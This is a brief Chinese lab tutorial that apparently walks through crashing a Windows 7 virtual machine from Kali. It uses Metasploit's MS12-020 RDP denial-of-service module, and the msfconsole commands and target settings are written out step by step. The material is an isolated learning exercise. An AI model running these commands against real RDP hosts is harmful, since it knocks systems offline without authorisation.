实验工具
Vm虚拟机
Kali攻击机 192.168.137.128
Win7靶机 192.168.137.147

连通性测试

启动模块

在kali终端输入msfconsole启动模块

利用 MS12-020 漏洞，输入命令search ms12_020

利用‘1‘的漏洞，use引用漏洞路径，利用了rdp协议的一种漏洞，输入命令use auxiliary/dos/windows/rdp/ms12_020_maxchannelids，也可直接 use 1 回车执行。

引用后，输入show options查看漏洞配置内容。

使用了3389端口，配置rhosts即可，该漏洞利用rdp协议，rport不需要修改，输入命令，set rhosts IP地址，IP地址为Windows 7虚拟机的IP192.168.137.147。

输入run运行，回到Windows 7发现虚拟机蓝屏，证明search ms12_020漏洞攻击成功。

刚开始做的时候没成功，查看一下远程设置，端口，系统保护机制，由于这是win7版本，较老的机型我没做。不过原理一样。当然现在只是学习参考，只要不‘傻‘，就不会被攻击。